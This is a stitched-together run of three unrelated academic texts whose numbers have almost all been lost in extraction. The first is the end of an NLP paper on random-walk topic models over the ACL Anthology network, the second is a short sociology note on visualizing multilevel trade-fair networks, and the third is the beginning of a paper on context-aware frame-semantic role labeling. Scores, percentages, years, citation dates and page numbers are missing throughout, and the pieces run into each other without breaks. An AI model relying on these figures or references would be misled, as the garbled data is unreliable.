walks from taking these wrong steps, we adjust the topology of the network using directed links to keep the random walks moving in the “right” direc- tion. we design the graph such that if we desire a random walk from nodes of type s to nodes of type t, the random walk will never be able to follow an out- going link that does not decrease its distance from the nodes of t. as shown in section . , there are certain nodes at which a random walk (like pagerank) arrives at more often than others simply because of their positions in the graph. this suggests that there may be stationary random walk distributions over entities, which we would need to adjust for in order to find the most significant entities for a topic. indeed this is what we do find. as an example, if we sample topics uniformly and take random walks to author nodes, by chance we end up at jun’ichi tsujii on . % of random walks, eduard hovy on . % of walks, etc. these values are about times greater than would be expected at random. to adjust for this effect, when we take a random walk from a topic x to an entity type t, we subtract out this stationary distribution for t, which corre- sponds to the proportion of random walks that end at any particular entity of type t by chance, and not by virtue of the fact that the walk started at topic x. the resulting distribution yields the entities of t that are most significantly associated with topic x. ta- ble gives examples of the most significant entities for a couple of topics. − − − − rw-cooc rw-sim rtm lda coherence figure : distribution of topic coherences for the four topic models. . topic model evaluation we provide two separate evaluations in this section, one of the topics alone, and one extrinstic evaluation of the entire paper-topic model. the variants of ran- dom walk topic models are compared against lda and the relational topic model (rtm), each with topics (chang and blei, ). as rtm allows only a single type of relationship between documents, we use citations as the inter-document relationships. . . topic coherence the coherence of a topic is evaluated using the co- herence metric introduced in (mimno et al., ). given the top m words v (t) = (v(t) , ...,v (t) m ) for a topic t, the coherence of that topic can be calculated with the following formula: c(t;v (t)) = m∑ m= m− ∑ l= log ( d(v (t) m ,v (t) l ) + d(v (t) l ) ) , where d(v) is the number of documents contain- ing v and d(v,v′) is the number of documents con- taining both v and v′. this measure of coherence is highly correlated with manual annotations of topic quality, with a higher coherence score corresponding to a more co- herent, higher quality topic. after calculating the co- herence for each of the topics for rtm and the random-walk topic model, the average coherence for rtm topics was - . and the average coherence for word-similarity random walk topics was - . , with statistical significance at p < . . figure demonstrates this, showing that the word similarity- based random walk method generates several highly coherent topics. the average coherence for the lda and the co-occurence random walk model were sig- nificantly lower. . . extrinsic evaluation one difficulty in evaluating this random-walk topic model intrinsically against a statistical topic model like rtm is that existing evaluation measures assume certain statistical properties of the topic, for example, that the topics are generated according to a dirichlet prior. because of this, we choose instead to evaluate this topic model extrinsically with a down- stream application. we choose an information re- trieval application, returning a ranked list of similar documents, given a reference document. we evaluate five different methods: citation- rtm, lda, the two versions of the random-walk topic model, and a simple word vector similarity baseline. similarity between documents with the topic models are determined by cosine similarity be- tween the topic vectors of the two documents. word vector similarity determines the similarity between documents by taking the cosine similarity of their word vectors. from these similarity scores, a ranked list is produced. the document set for this task is the set of all pa- pers appearing at acl between and . the top results returned by each method are pooled and manually evaluated with a relevance score be- tween and . thirty such result sets were manu- ally annotated. we then evaluate each method ac- cording to its discounted cumulative gain (dcg) (järvelin and kekäläinen, ). performance of these methods is summarized in table . the co-occurence-based random walk topic model performed comparably with the best per- former at this task, lda, and there was no signifi- cant difference between the two at p < . . going forward, an important problem is to rec- oncile the co-occurence- and word-similarity-based formulations of this topic model, as the two formu- lations perform very differently in our two evalua- tions. heuristically, the co-occurence model seems to create good human-readable topics, while the word-similarity model creates topics that are more mathematically-coherent, but less human-readable. related work heterogeneous networks have been studied in a number of different fields, such as biology (sio- son, ), transportation networks (lozano and method dcg word vector . ± . lda . ± . rtm . ± . random-walk (cooc) . ± . random-walk (sim) . ± . table : dcg performance of the various topic models and baselines on the related document find- ing task. a % confidence interval is provided. storchi, ), social networks (lambiotte and aus- loos, ), and bibliographic networks (sun et al., ). these networks are also sometimes known by the name complex networks or multimodal net- works, but both these terms have other connotations. we prefer “heterogeneous networks” as used by sun et al. ( ). there has also been some study of these networks in general, in community detection (murata, ), clustering (long et al., ; sun et al., ), and data mining (muthukrishnan et al., ), but there has not yet been any comprehensive study. recently, nlp has seen several uses of heterogeneous net- works (though not by that name) for use with label propagation algorithms (das and petrov, ; spe- riosu et al., ) and random walks (toutanova et al., ; kok and brockett, ). several authors have proposed the idea of using network centrality measures to rank the impacts of journals, authors, papers, etc. (bollen et al., ; bergstrom et al., ; chen et al., ; liu et al., ), and it has even been proposed that central- ity can be applicable in bipartite networks (zhou et al., ). we propose that pagerank on any gen- eral heterogeneous network is appropriate for creat- ing ranked lists for each type of entity. most previ- ous papers also lack a robust evaluation, demonstrat- ing agreement with previous methods or with some external awards or recognitions. we use a random graph that replicates the properties of the real-world network to show that pagerank on the heterogeneous network outperforms other methods. name disambiguation has been studied in a num- ber of different settings, including graph-based set- tings. it is common to use the coauthorship graph (kang et al., ; fan et al., ), but authors have also used lexical similarity graphs (on and lee, ), citation graphs (mcrae-spencer and shad- bolt, ), or social networks (malin, ). al- most all graph methods are unsupervised. there have been some topic models developed specifically for relational data (wang et al., ; airoldi et al., ), but both of these models have limitations in the types of relational data they are able to model. the group topic model described in (wang et al., ) is able to create stronger topics by considering associations between words, events, and entities, but is very coarse in the way it han- dles the behavior of entities, and does not generalize to multiple different types of entities. the stochas- tic blockmodel of (airoldi et al., ) can create blocks of similar entities in a graph and is general in the types of graphs it can handle, but produces less meaningful results on graphs that have specific schemas. conclusion and future directions in this paper, we present a heterogeneous net- work treatment of the acl anthology network and demonstrate several applications of it. using only off-the-shelf graph algorithms with a single data rep- resentation, the heterogeneous aan, we are able to very easily build a scientific impact measure that is more accurate than existing measures, an author dis- ambiguation system better than existing graph-based author disambiguation systems, and a random-walk- based topic model that is competitive with statistical topic models. while there are many other tasks, such as citation- based summarization, that could likely be ap- proached using this framework with the appropri- ate addition of new types of nodes into the hetero- geneous aan network, there are even some poten- tial synergies between the tasks described in this pa- per that have yet to be explored. for example, we may consider that the methods of the author disam- biguation or topic modeling tasks could be to find the highest-impact papers associated with a term (for survey generation, perhaps) or high-impact authors associated with a workshop’s topic (to select good reviewers for it). we believe that heterogeneous graphs are a flexible framework that will allow re- searchers to find simple, flexible solutions for a va- riety of problems. acknowledgments this research is supported by the intelligence advanced research projects activity (iarpa) via department of interior national business center (doi/nbc) contract number d pc . the u.s. government is autho- rized to reproduce and distribute reprints for governmen- tal purposes notwithstanding any copyright annotation thereon. disclaimer: the views and conclusions con- tained herein are those of the authors and should not be interpreted as necessarily representing the official poli- cies or endorsements, either expressed or implied, of iarpa, doi/nbc, or the u.s. government. references edoardo m. airoldi, david m. blei, stephen e. fienberg, and eric p. xing. . mixed membership stochastic blockmodels. the journal of machine learning re- search, : – . réka albert and albert-lászló barabási. . statisti- cal mechanics of complex networks. reviews of mod- ern physics, ( ): . a.l. barabási and r. albert. . emergence of scal- ing in random networks. science, ( ): – . carl t. bergstrom, jevin d. west, and marc a. wiseman. . the eigenfactor metrics. the journal of neuro- science, ( ): – . steven bird, robert dale, bonnie j dorr, bryan gib- son, mark joseph, min-yen kan, dongwon lee, brett powley, dragomir r radev, and yee fan tan. . the acl anthology reference corpus: a reference dataset for bibliographic research in computational lin- guistics. in proc. of the th international conference on language resources and evaluation conference (lrec ), pages – . d.m. blei, a.y. ng, and m.i. jordan. . latent dirichlet allocation. the journal of machine learning research, : – . johan bollen, marko a. rodriguez, and herbert van de sompel. . journal status. corr, abs/cs/ . johan bollen, herbert van de sompel, aric hagberg, and ryan chute. . a principal component analysis of scientific impact measures. plos one, ( ):e . tibor braun, wolfgang glänzel, and andrás schubert. . a hirsch-type index for journals. scientomet- rics, ( ): – . jonathan chang and david m blei. . hierarchical relational models for document networks. the annals of applied statistics, ( ): – . peng chen, huafeng xie, sergei maslov, and sid redner. . finding scientific gems with googles pagerank algorithm. journal of informetrics, ( ): – . aaron clauset, cosma rohilla shalizi, and mark ej newman. . power-law distributions in empirical data. siam review, ( ): – . dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based projec- tions. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies, pages – . paul erdős and alfréd rényi. . on the evolution of random graphs. magyar tud. akad. mat. kutató int. közl, : – . günes erkan and dragomir r. radev. . lexrank: graph-based lexical centrality as salience in text sum- marization. j. artif. intell. res. (jair), : – . xiaoming fan, jianyong wang, xu pu, lizhu zhou, and bing lv. . on graph-based name disambigua- tion. j. data and information quality, ( ): : – : , february. william a. gale, kenneth w. church, and david yarowsky. . work on statistical methods for word sense disambiguation. in working notes of the aaai fall symposium on probabilistic approaches to natu- ral language, volume , page . david hall, daniel jurafsky, and christopher d. man- ning. . studying the history of ideas using topic models. in proceedings of the conference on empir- ical methods in natural language processing, pages – . acl. ahmed hassan, amjad abu-jbara, and dragomir radev. . extracting signed social networks from text. textgraphs- , page . jorge e. hirsch. . an index to quantify an indi- vidual’s scientific research output. proceedings of the national academy of sciences of the united states of america, ( ): . thomas hofmann. . probabilistic latent semantic indexing. in proceedings of the nd annual interna- tional acm sigir conference on research and devel- opment in information retrieval, pages – . acm. kalervo järvelin and jaana kekäläinen. . ir evalua- tion methods for retrieving highly relevant documents. in proceedings of the rd annual international acm sigir conference on research and development in in- formation retrieval, pages – . acm. in-su kang, seung-hoon na, seungwoo lee, hanmin jung, pyung kim, won-kyung sung, and jong-hyeok lee. . on co-authorship for author disam- biguation. information processing & management, ( ): – . brian karrer and mark ej newman. . stochas- tic blockmodels and community structure in networks. physical review e, ( ): . stanley kok and chris brockett. . hitting the right paraphrases in good time. in human language tech- nologies: the annual conference of the north american chapter of the association for computa- tional linguistics, pages – . acl. oren kurland and lillian lee. . pagerank without hyperlinks: structural reranking using links induced by language models. in sigir ’ . renaud lambiotte and marcel ausloos. . collabo- rative tagging as a tripartite network. computational science–iccs , pages – . david liben-nowell and jon kleinberg. . the link- prediction problem for social networks. journal of the american society for information science and technol- ogy, ( ): – . r.n. lichtenwalter, j.t. lussier, and n.v. chawla. . new perspectives and methods in link prediction. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, pages – . acm. xiaoming liu, johan bollen, michael l. nelson, and herbert van de sompel. . co-authorship net- works in the digital library research community. infor- mation processing & management, ( ): – . bo long, zhongfei zhang, and tianbing xu. . clustering on complex graphs. in proc. the rd conf. aaai . angelica lozano and giovanni storchi. . shortest viable hyperpath in multimodal networks. transporta- tion research part b: methodological, ( ): – . bradley malin. . unsupervised name disambigua- tion via social network similarity. in workshop on link analysis, counterterrorism, and security, vol- ume , pages – . sergei maslov and sidney redner. . promise and pitfalls of extending google’s pagerank algorithm to citation networks. the journal of neuroscience, ( ): – . ryan mcdonald, fernando pereira, kiril ribarov, and jan hajič. . non-projective dependency pars- ing using spanning tree algorithms. in proceedings of the conference on human language technology and empirical methods in natural language processing, pages – . acl. duncan m. mcrae-spencer and nigel r. shadbolt. . also by the same author: aktiveauthor, a cita- tion graph approach to name disambiguation. in pro- ceedings of the th acm/ieee-cs joint conference on digital libraries, pages – . acm. rada mihalcea and paul tarau. . textrank: bring- ing order into texts. in proceedings of emnlp, vol- ume , pages – . barcelona, spain. rada mihalcea. . unsupervised large-vocabulary word sense disambiguation with graph-based algo- rithms for sequence data labeling. in proceedings of hlt-emnlp, pages – . acl. david mimno, hanna m. wallach, edmund talley, miriam leenders, and andrew mccallum. . op- timizing semantic coherence in topic models. in pro- ceedings of the conference on empirical methods in natural language processing, pages – . acl. panchanan mitra. . hirsch-type indices for rank- ing institutions scientific research output. current sci- ence, ( ): . tsuyoshi murata. . detecting communities from tripartite networks. in proceedings of the th inter- national conference on world wide web, pages – . acm. pradeep muthukrishnan, dragomir radev, and qiaozhu mei. . edge weight regularization over mul- tiple graphs for similarity learning. in data mining (icdm), ieee th international conference on, pages – . ieee. mark e.j. newman and juyong park. . why social networks are different from other types of networks. physical review e, ( ): . byung-won on and dongwon lee. . scalable name disambiguation using multi-level graph partition. in proceedings of the th siam international conference on data mining, pages – . lawrence page, sergey brin, rajeev motwani, and terry winograd. . the pagerank citation ranking: bringing order to the web. romualdo pastor-satorras and alessandro vespignani. . epidemic spreading in scale-free networks. physical review letters, ( ): – . dragomir r. radev, pradeep muthukrishnan, vahed qazvinian, and amjad abu-jbara. . the acl anthology network corpus. language resources and evaluation, pages – . william m. rand. . objective criteria for the eval- uation of clustering methods. journal of the american statistical association, ( ): – . s. redner. . how popular is your paper? an empir- ical study of the citation distribution. the european physical journal b-condensed matter and complex systems, ( ): – . p. sarkar, a.w. moore, and a. prakash. . fast incre- mental proximity search in large graphs. in proceed- ings of the th international conference on machine learning, pages – . acm. allan a. sioson. . multimodal networks in biology. ph.d. thesis, virginia polytechnic institute and state university. michael speriosu, nikita sudan, sid upadhyay, and ja- son baldridge. . twitter polarity classification with label propagation over lexical links and the fol- lower graph. in proceedings of the first workshop on unsupervised learning in nlp, pages – , edin- burgh, scotland, july. acl. alexander strehl and joydeep ghosh. . cluster ensembles—a knowledge reuse framework for com- bining multiple partitions. the journal of machine learning research, : – . yizhou sun, jiawei han, peixiang zhao, zhijun yin, hong cheng, and tianyi wu. . rankclus: inte- grating clustering with ranking for heterogeneous in- formation network analysis. in proceedings of the th international conference on extending database technology: advances in database technology, pages – . acm. yizhou sun, rick barber, manish gupta, and jiawei han. . co-author relationship prediction in heteroge- neous bibliographic networks. yizhou sun, charu c. aggarwal, and jiawei han. . relation strength-aware clustering of heterogeneous information networks with incomplete attributes. pro- ceedings of the vldb endowment, ( ): – . ben taskar, ming-fai wong, pieter abbeel, and daphne koller. . link prediction in relational data. in neural information processing systems, volume . robert tibshirani, guenther walther, and trevor hastie. . estimating the number of clusters in a data set via the gap statistic. journal of the royal sta- tistical society: series b (statistical methodology), ( ): – . kristina toutanova, christopher d manning, and an- drew y ng. . learning random walk models for inducing word dependency distributions. in pro- ceedings of the twenty-first international conference on machine learning, page . acm. xuerui wang, natasha mohanty, and andrew mccallum. . group and topic discovery from relations and their attributes. technical report, dtic document. kai yu, shipeng yu, and volker tresp. . soft clustering on graphs. advances in neural information processing systems, : . ding zhou, sergey a. orshanskiy, hongyuan zha, and c. lee giles. . co-ranking authors and docu- ments in a heterogeneous network. in data mining, . icdm . seventh ieee international con- ference on, pages – . ieee. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /) connections issue | vol. article | doi: . /connections- . visualizing multilevel networks for the analysis of superposed levels of collective agency emmanuel lazega* sciences po paris, iuf centre de sociologie des organisations, france. *e-mail: emmanuel.lazega@ sciencespo.fr the upper level this is the inter-organizational network in which the ties are economic relationships (business deals) signed at time t between companies (the nodes). the pattern represents a core-periphery structure. in the core, the more central companies (the majors of this industry and a few other of smaller companies that managed to sign a contract with the majors) drive the economic action (contracting). the periphery is composed of many small companies (the nodes on the outer upper circle) that did not sign any contract abstract this picture, produced by julien brailly et al. ( ) and david schoch ( ), visualizes multilevel networks of individuals and organizations. keywords multilevel networks, image. visualizing multilevel networks for the analysis of superposed levels of collective agency that year and thus find themselves isolated, as if they were watching the action from a balcony. the lower level this is the inter-individual level in which the ties are informal discussion and personal information gathering at time t− between these individuals. the high density of this lower, inter-individual network represents the fact that members of competing companies talk to each other actively. vertical ties these ties between nodes from the lower level and nodes at the upper level are affiliation ties of each individual in their organizations. the empirical setting this multilevel network was measured in the largest trade fair for television programs in eastern europe. in this trade fair, nodes at the upper level are companies and institutions of the global and regional television industry. they sell, buy, distribute programs, and regulate the industry. color codes at this upper level represent the organizations composing the value chain in , for example broadcasters in blue, distributors in green, independent buyers in purple, media groups in yellow, producers in brown. nodes at the lower level are mainly individual sales representatives, sellers and buyers of tv programs meeting at this trade fair to keep abreast of new films, series and game shows, to observe market trends and evolutions, and to discuss contracts in . sellers mainly from the usa and western europe come to pitch and sell their audiovisual products to regional and local buyers such as the broadcasting companies (television channels for example). the density of this inter-individual network represents the “buzz” network between these sales representatives in this trade fair, emphasizing the crucial role of cooperation among interdependent competitors (lazega and mounier, ; lazega et al., ; lazega, ) as a multilevel phenomenon. for a substantive explanation of this graph, see brailly ( ). sociological interpretation from an economic sociology perspective, such pat- terns facilitate the study of multilevel, multiplex and multisided overlaps across levels, to provide a new perspective on markets as multilevel networks. in these multilevel networks, a relationship between two firms creates a context that facilitates the creation or maintenance of relationships between their em- ployees, and the other way around: interpersonal relation ships between sales representatives contri- bute to the formation of inter-organizational, con- tracting ties (bathelt and glückler, ; berends et al., ). in this context, social relationships are not only behind the deals, they are also around them. in other words, social relationships are not only between buyers and sellers, but also among buyers and among sellers. as a result, such relationships need to be contextualized in their relational neighborhood. for example, imagine the following hypothetical scenario: seller a can give an opportunity to seller b concerning a buyer c such as “c is looking for products you have.” seller a gives this opportunity to seller b only because they are “friends” and they have known each other for a long time, expecting direct reciprocity. this opportunity is relevant because seller a’s company has already closed a deal with buyer c’s company and so seller a is aware of buyer c’s needs and bargaining behavior. this situation leads to the creation of a new relationship between seller b and buyer c in the form of a meeting to discuss a potential deal. this complex pattern helps redefine the nature of markets (brailly et al., ) as multilevel, socially organized settings. in this specific setting, a limited number of very large companies dominate the market with smaller companies gravitating around this core, suggesting an oligopolistic structure that economists call “oligopoly with fringes.” trade fairs as field- configuring events contribute to the reproduction of this oligopolistic, multilevel and coopetitive structure. in the sociology of culture, it helps understand, from a neo-structural perspective, the mechanisms under- lying contemporary globalization and uniformization of culture (brailly et al., ; favre et al., ). methodological foundations and extensions for a general perspective on multilevel networks in the social sciences, see snijders ( ). multilevel blockmodels and stochastic blockmodels for such data are available in Žiberna ( ), barbillon et al. ( ) and chabert-liddell et al. ( ). for multilevel ergms associated with this data format, see wang et al. ( ). for multilevel ergms ana lyzing this dataset, see brailly ( ) brailly et al. ( ) and favre et al. ( ). for more methods using multilevel connections network analyses, see various chapters in lazega and snijders ( ), lomi et al. ( ), koskinen et al. ( ), tranmer et al. ( ). references barbillon, p., donnet, s., lazega, e. and bar-hen, a. . stochastic block-models for multiplex networks: an application to a multilevel network of researchers. journal of the royal statistical society: series a (statistics in society) : – . bathelt, h. and glückler, j. . toward a relational economic geography. journal of economic geography : – . berends, h., van burg, e. and van raaij, e. m. . contacts and contracts: crosslevel network dynamics in the development of an aircraft material. organization science : – . brailly, j. . dynamics of networks in trade fairs—a multilevel relational approach to the cooperation among competitors. journal of economic geography : – . brailly, j., favre, g., chatellet, j. and lazega, e. . embeddedness as a multilevel problem: a case study in economic sociology. social networks : – . chabert-liddell, s. c., barbillon, p., donnet, s. and lazega, e. . a stochastic block model for multilevel networks: application to the sociology of organisations. arxiv preprint arxiv: . (accessed december , ). favre, g., brailly, j., chatellet, j. and lazega, e. . “inter-organizational network influence on long term and short term inter-individual relationships: the case of a trade fair for tv programs distribution in sub-saharan africa”, in lazega, e. and snijders, t. a. b. (eds), multilevel network analysis for the social sciences springer, dordrecht. koskinen, j., broccatelli, c., wang, p. and robins, g. . “bayesian analysis of erg models for multilevel, multiplex, and multilayered networks with sampled or missing data”, convegno della società italiana di statistica springer, cham, pp. – . lazega, e. . bureaucracy, collegiality and social change: redefining organizations with multilevel relational infrastructures edward elgar publishing, cheltenham. lazega, e. and mounier, l. . “interdependent entrepreneurs and the social discipline of their cooperation: the research program of structural economic sociology for a society of organizations”, in favereau, o. and lazega, e. (eds), conventions and structures in economic organization: markets, networks, and hierarchies edward elgar publishing, cheltenham, pp. – . lazega, e. and snijders, t. a. b. . “the multiple flavours of multilevel issues for networks”, in lazega, e. and snijders, t. a. b. multilevel network analysis for the social sciences springer, cham, pp. – . lazega, e., jourda, m. -t., mounier, l. and stofer, r. . catching up with big fish in the big pond? multi-level network analysis through linked design. social networks : – . lomi, a. robins, g. and tranmer, m. . “introduction to multilevel social networks”, social networks, : – . schoch, d. . visualizing multilevel networks with graphlayouts, available at: http://blog.schochastics.net/ post/visualizing-multilevel-networks-with-graphlayouts/ (accessed december , ). tranmer, m. pallotti, f. and lomi, a. . “the embeddedness of organizational performance: multiple membership multiple classification models for the analysis of multilevel networks”, social networks, : – . wang, p., robins, g. l., pattison, p. e. and lazega, e. . exponential random graph models for multi- level networks. social networks : – . Žiberna, a. . blockmodeling of multilevel networks. social networks : – . edinburgh research explorer context-aware frame-semantic role labeling citation for published version: roth, m & lapata, m , 'context-aware frame-semantic role labeling', transactions of the association for computational linguistics, vol. , pp. - . <https://tacl .cs.columbia.edu/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://tacl .cs.columbia.edu/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/contextaware-framesemantic-role-labeling( f eb- - - -e efcb d e).html context-aware frame-semantic role labeling michael roth and mirella lapata school of informatics, university of edinburgh crichton street, edinburgh eh ab {mroth,mlap}@inf.ed.ac.uk abstract frame semantic representations have been useful in several applications ranging from text-to-scene generation, to question answer- ing and social network analysis. predicting such representations from raw text is, how- ever, a challenging task and corresponding models are typically only trained on a small set of sentence-level annotations. in this pa- per, we present a semantic role labeling sys- tem that takes into account sentence and dis- course context. we introduce several new fea- tures which we motivate based on linguistic insights and experimentally demonstrate that they lead to significant improvements over the current state-of-the-art in framenet-based se- mantic role labeling. introduction the goal of semantic role labeling (srl) is to iden- tify and label the arguments of semantic predicates in a sentence according to a set of predefined re- lations (e.g., “who” did “what” to “whom”). in addition to providing definitions and examples of role labeled text, resources like framenet (ruppen- hofer et al., ) group semantic predicates into so- called frames, i.e., conceptual structures describing the background knowledge necessary to understand a situation, event or entity as a whole as well as the roles participating in it. accordingly, semantic roles are defined on a per-frame basis and are shared among predicates. in recent years, frame representations have been successfully applied in a range of downstream tasks, including question answering (shen and lapata, ), text-to-scene generation (coyne et al., ), stock price prediction (xie et al., ), and so- cial network extraction (agarwal et al., ). whereas some tasks directly utilize information encoded in the framenet resource, others make use of framenet indirectly through the output of srl systems that are trained on data annotated with frame-semantic representations. while ad- vances in machine learning have recently given rise to increasingly powerful srl systems follow- ing the framenet paradigm (hermann et al., ; täckström et al., ), little effort has been devoted to improve such models from a linguistic perspec- tive. in this paper, we explore insights from the lin- guistic literature suggesting a connection between discourse and role labeling decisions and show how to incorporate these in an srl system. although early theoretical work (fillmore, ) has recog- nized the importance of discourse context for the assignment of semantic roles, most computational approaches have shied away from such considera- tions. to see how context can be useful, consider as an example the delivery frame, which states that a theme can be handed off to either a recipient or “more indirectly” to a goal. while the distinc- tion between the latter two roles might be clear for some fillers (e.g., people vs. locations), there are oth- ers where both roles are equally plausible and addi- tional information is required to resolve the ambigu- ity (e.g., countries). if we hear about a letter being delivered to greece, for instance, reliable cues might be whether the sender is a person or a country and transactions of the association for computational linguistics, vol. , pp. – , . action editor: diana mccarthy. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by . license. whether greece refers to the geographic region or to the greek government. the example shows that context can generally in- fluence the choice of correct role label. accordingly, we assume that modeling contextual information, such as the meaning of a word in a given situation, can improve semantic role labeling performance. to validate this assumption, we explore different ways of incorporating contextual cues in a srl model and provide experimental support that demonstrates the usefulness of such additional information. the remainder of this paper is structured as fol- lows. in section , we present related work on se- mantic role labeling and the various features applied in traditional srl systems. in section , we provide additional background on the framenet resource. sections and describe our baseline system and contextual extensions, respectively, and section presents our experimental results. we conclude the paper by discussing in more detail the output of our system and highlighting avenues for future work. related work early work in srl dates back to gildea and juraf- sky ( ), who were the first to model role assign- ment to verb arguments based on framenet. their model makes use of lexical and syntactic features, including binary indicators for the words involved, syntactic categories, dependency paths as well as po- sition and voice in a given sentence. most subse- quent work in srl builds on gildea and jurafsky’s feature set, often with the addition of features that describe relevant syntactic structures in more de- tail, e.g., the argument’s leftmost/rightmost depen- dent (johansson and nugues, ). more sophisticated features include the use of convolution kernels (moschitti, ; croce et al., ) in order to represent predicate-argument structures and their lexical similarities more accu- rately. beyond lexical and syntactic information, a few approaches employ additional semantic fea- tures based on annotated word senses (che et al., ) and selectional preferences (zapirain et al., ). deschacht and moens ( ) and huang and yates ( ) use sentence-internal sequence in- formation, in the form of latent states in a hidden markov model. more recently, a few approaches (roth and woodsend, ; lei et al., ; foland and martin, ) explore ways of using low-rank vector and tensor approximations to represent lex- ical and syntactic features as well as combinations thereof. to the best of our knowledge, there exists no prior work where features based on discourse con- text are used to assign roles on the sentence level. discourse-like features have been previously ap- plied in models that deal with so-called implicit ar- guments, i.e., roles which are not locally realized but resolvable within the greater discourse context (ruppenhofer et al., ; gerber and chai, ). successful features for resolving implicit arguments include the distance between mentions and any dis- course relations occurring between them (gerber and chai, ), roles assigned to mentions in the previous context, the discourse prominence of the denoted entity (silberer and frank, ), and its centering status (laparra and rigau, ). none of these features have been used in a standard srl system to date (and trivially, not all of them will be helpful as, for example, the number of sentences be- tween a predicate and an argument is always zero within a sentence). in this paper, we extend the contextual features used for resolving implicit ar- guments to the srl task and show how a set of discourse-level enhancements can be added to a tra- ditional sentence-level srl model. framenet the berkeley framenet project (ruppenhofer et al., ) develops a semantic lexicon and an annotated example corpus based on fillmore’s ( ) theory of frame semantics. annotations consist of frame- evoking elements (i.e., words in a sentence that are associated with a conceptual frame) and frame ele- ments (i.e., instantiations of semantic roles, which are defined per frame and filled by words or word sequences in a given sentence). for example, the delivery frame describes a scene or situation in which a deliverer hands off a theme to a re- cipient or a goal. in total, there are , frames and , frame elements defined in the lat- see https://framenet .icsi.berkeley.edu/ for a comprehensive list of frames and their definitions. est publicly available version of framenet. an av- erage number of . different frame-evoking ele- ments are provided for each frame ( , in total). following previous work on framenet-based srl, we use the full text annotation data set, which con- tains , frame instances. semantic annotations for frame instances and fillers of frame elements are generally provided at the level of word sequences, which can be single words, complete or incomplete phrases, and entire clauses (ruppenhofer et al., , chapter ). an instance of the delivery frame, with annotations of the frame-evoking element (underlined) and in- stantiated frame elements (in brackets), is given in the example below: ( ) the soviet union agreed to speed up [oil]theme deliveriesdelivery [to yugoslavia]recipient . note that the oil deliveries here concern yugoslavia as a geopolitical entity and hence the recipient role is assigned. if yugoslavia was referred to as the location of a delivery, the goal role would be assigned instead. in general, roles can be restricted by so-called semantic types (e.g., every filler of the theme element in the delivery frame needs to be a physical object). however, not all roles are typed and whether a specific phrase is a suitable filler largely depends on context. baseline model as a baseline for implementing contextual enhance- ments to an srl model, we use the semantic role labeling components provided by the mate-tools (björkelund et al., ). given a frame-evoking el- ement in a sentence and its associated frame (i.e., a predicate and its sense), the mate-tools form a pipeline of logistic regression classifiers that iden- tify and label frame elements which are instantiated within the same sentence (i.e., a given predicate’s arguments). the adopted srl system has been developed for propbank/nombank-style role labeling and we make several changes to adapt it to framenet. specifically, we change the argument labeling pro- cedure from predicate-specific to frame-specific version . , released september . roles and implement i/o methods to read and gen- erate framenet xml files. for direct compari- son with the previous state-of-the-art for framenet- based srl, we further implement additional fea- tures used in the semafor system (das et al., ) and combine the role labeling compo- nents of mate-tools with semafor’s preprocess- ing toolchain. all features used in our system are listed in table . the main differences between our adaptation of mate-tools and semafor are as follows: whereas the latter implements identification and labeling of role fillers in one step, mate-tools follow the in- sight that these two steps are conceptually differ- ent (xue and palmer, ) and should be modeled separately. accordingly, mate-tools contain a global reranking component which takes into account iden- tification and labeling decisions while semafor only uses reranking techniques to filter overlapping argument predictions and other constraints (see das et al., for details). we discuss the advantage of a global reranker for our setting in section . extensions based on context context can be relevant for semantic role labeling in various different ways. in this section, we moti- vate and describe four extensions over previous ap- proaches. the first extension is a set of features that model document-specific aspects of word meaning using distributional semantics. the motivation for this fea- ture class stems from the insight that the meaning of a word in context can influence correct role assign- ment. while concepts such as polysemy, homonymy and metonymy are all relevant here, the scarce train- ing data available for framenet-based srl calls for a light-weight model that can be applied without large amounts of labeled data. we therefore employ distributional word representations which we criti- cally adapt based on document content. we describe our contribution in section . . entities that fill semantic roles are sometimes mentioned in discourse. given a specific mention we note that better results have been reported in hermann et al. ( ) and täckström et al. ( ). however, both of these more recent approaches rely on a custom frame identifi- cation component as well as proprietary tools and models for tagging and parsing which are not publicly available. argument identification and classification lemma form of f pos tag of f any syntactic dependents of f* subcat frame of f* voice of a* any lemma in a* number of words in a first word and pos tag in a second word and pos tag in a last word and pos tag in a relation from first word in a to its parent relation from second word in a to its parent relation from last word in a to its parent relative position of a with respect to p voice of a and relative position with respect to p* identification only lemma form of the first word in a lemma form of the syntactic head of a lemma form of the last word in a pos tag of the first word in a pos tag of the syntactic head of a pos tag of the last word in a relation from syntactic head of a to its parent dependency path from a to f length of dependency path from a to f number of words between a and f table : features from das et al. ( ) which we adopt in our model; a denotes the argument span under con- sideration, f refers to the corresponding frame evoking element. identification features are instantiated as binary indicator features. features marked with an asterisk are role specific. all other features apply to combinations of role and frame. for which a role is to be predicted, we can also di- rectly use previous role assignments as classification cues. we describe our implementation of this feature in section . . the filler of a semantic role is often a word or phrase which occurs only once or a few times in a document. if neither syntax nor aspects of lexi- cal meaning provide cues indicating a unique role, useful information can still be derived from the dis- course salience of the denoted entity. our model makes use of a simple salience indicator that can be reliably derived from automatically computed coref- erence chains. we describe the motivation and ac- tual implementation of this feature in section . . the aforementioned features will influence role labeling decisions directly, however, further im- provements can be gained by considering interac- tions between labeling decisions. as discussed in das et al. ( ), role annotations in framenet are unique with respect to a frame instance in more than % of cases. this means that even if a feature is not a positive indicator for a candidate role filler, knowing it would be a better cue for another can- didate can also prevent a hypothetical model from assigning a frame element label incorrectly. while this kind of knowledge has been successfully im- plemented as constraints in recent framenet-based srl models (hermann et al., ; täckström et al., ), earlier work on propbank-based role label- ing suggests that better performance can be achieved with a re-ranking component which has the poten- tial to learn such constraints and other interactions implicitly (toutanova et al., ; björkelund et al., ). in our model, we adopt the latter method and extend it with additional frame-based features. we describe this approach in more detail in section . . . modeling word meaning in context the underlying idea of distributional models of se- mantics is that meaning can be acquired based on distributional properties 